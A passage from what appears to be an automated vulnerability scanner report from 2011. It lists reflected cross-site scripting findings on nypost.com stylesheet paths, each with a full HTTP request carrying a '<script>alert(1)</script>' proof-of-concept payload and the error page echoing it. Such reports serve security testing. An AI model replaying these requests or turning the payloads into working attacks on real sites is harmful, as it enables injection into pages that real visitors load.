Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:33 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost3192f<script>alert(1)</script>ce481558adf/blocks/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.168. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 59c0d<script>alert(1)</script>06928e5fd29 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks59c0d<script>alert(1)</script>06928e5fd29/_homepage/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks59c0d<script>alert(1)</script>06928e5fd29/_homepage/columnists/columnists.css</p>
...[SNIP]...

1.169. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 44dab<script>alert(1)</script>232703e53ee was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage44dab<script>alert(1)</script>232703e53ee/columnists/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:37 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_homepage44dab<script>alert(1)</script>232703e53ee/columnists/columnists.css</p>
...[SNIP]...

1.170. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 6d512<script>alert(1)</script>4c56166ae8e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists6d512<script>alert(1)</script>4c56166ae8e/columnists.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:39 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists6d512<script>alert(1)</script>4c56166ae8e/columnists.css</p>
...[SNIP]...

1.171. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload a2474<script>alert(1)</script>71fb61d3344 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.cssa2474<script>alert(1)</script>71fb61d3344 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 735
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:41 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_homepage/columnists/columnists.cssa2474<script>alert(1)</script>71fb61d3344</p>
...[SNIP]...

1.172. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ca49c<script>alert(1)</script>fb9e79d983d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigca49c<script>alert(1)</script>fb9e79d983d/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:19 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigca49c<script>alert(1)</script>fb9e79d983d/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.173. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload cff06<script>alert(1)</script>dce59e57048 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalcff06<script>alert(1)</script>dce59e57048/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:21 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalcff06<script>alert(1)</script>dce59e57048/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.174. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f949a<script>alert(1)</script>e6ac455d380 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostf949a<script>alert(1)</script>e6ac455d380/blocks/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostf949a<script>alert(1)</script>e6ac455d380/blocks/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.175. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8670b<script>alert(1)</script>db8e6dc803f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks8670b<script>alert(1)</script>db8e6dc803f/_promos/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:27 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks8670b<script>alert(1)</script>db8e6dc803f/_promos/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.176. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 704f1<script>alert(1)</script>af0fc94043d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos704f1<script>alert(1)</script>af0fc94043d/promos_and_partners/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:29 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_promos704f1<script>alert(1)</script>af0fc94043d/promos_and_partners/promos_and_partners.css</p>
...[SNIP]...

1.177. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 12925<script>alert(1)</script>0cb86b9952 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners12925<script>alert(1)</script>0cb86b9952/promos_and_partners.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 750
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:35 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners12925<script>alert(1)</script>0cb86b9952/promos_and_partners.css</p>
...[SNIP]...

1.178. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.css

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload c262d<script>alert(1)</script>8a886726475 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.cssc262d<script>alert(1)</script>8a886726475 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 751
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/_promos/promos_and_partners/promos_and_partners.cssc262d<script>alert(1)</script>8a886726475</p>
...[SNIP]...

1.179. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bffa7<script>alert(1)</script>5fc3b51a0a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigbffa7<script>alert(1)</script>5fc3b51a0a1/WebPortal/nypost/blocks/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:00 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigbffa7<script>alert(1)</script>5fc3b51a0a1/WebPortal/nypost/blocks/ads/ads.css</p>
...[SNIP]...

1.180. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e4cf7<script>alert(1)</script>aab02ede959 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortale4cf7<script>alert(1)</script>aab02ede959/nypost/blocks/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:02 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortale4cf7<script>alert(1)</script>aab02ede959/nypost/blocks/ads/ads.css</p>
...[SNIP]...

1.181. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cfdca<script>alert(1)</script>d30004878bb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostcfdca<script>alert(1)</script>d30004878bb/blocks/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:08 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostcfdca<script>alert(1)</script>d30004878bb/blocks/ads/ads.css</p>
...[SNIP]...

1.182. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1fd42<script>alert(1)</script>67ffcdae71 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks1fd42<script>alert(1)</script>67ffcdae71/ads/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 710
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:10 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks1fd42<script>alert(1)</script>67ffcdae71/ads/ads.css</p>
...[SNIP]...

1.183. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d8b49<script>alert(1)</script>24ae8c1056d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/adsd8b49<script>alert(1)</script>24ae8c1056d/ads.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:14 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/adsd8b49<script>alert(1)</script>24ae8c1056d/ads.css</p>
...[SNIP]...

1.184. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 1bdbd<script>alert(1)</script>b06ae33e8bd was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css1bdbd<script>alert(1)</script>b06ae33e8bd HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 711
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/ads/ads.css1bdbd<script>alert(1)</script>b06ae33e8bd</p>
...[SNIP]...

1.185. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/block_links/block_links.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59948<script>alert(1)</script>50cd9c0218a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig59948<script>alert(1)</script>50cd9c0218a/WebPortal/nypost/blocks/block_links/block_links.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
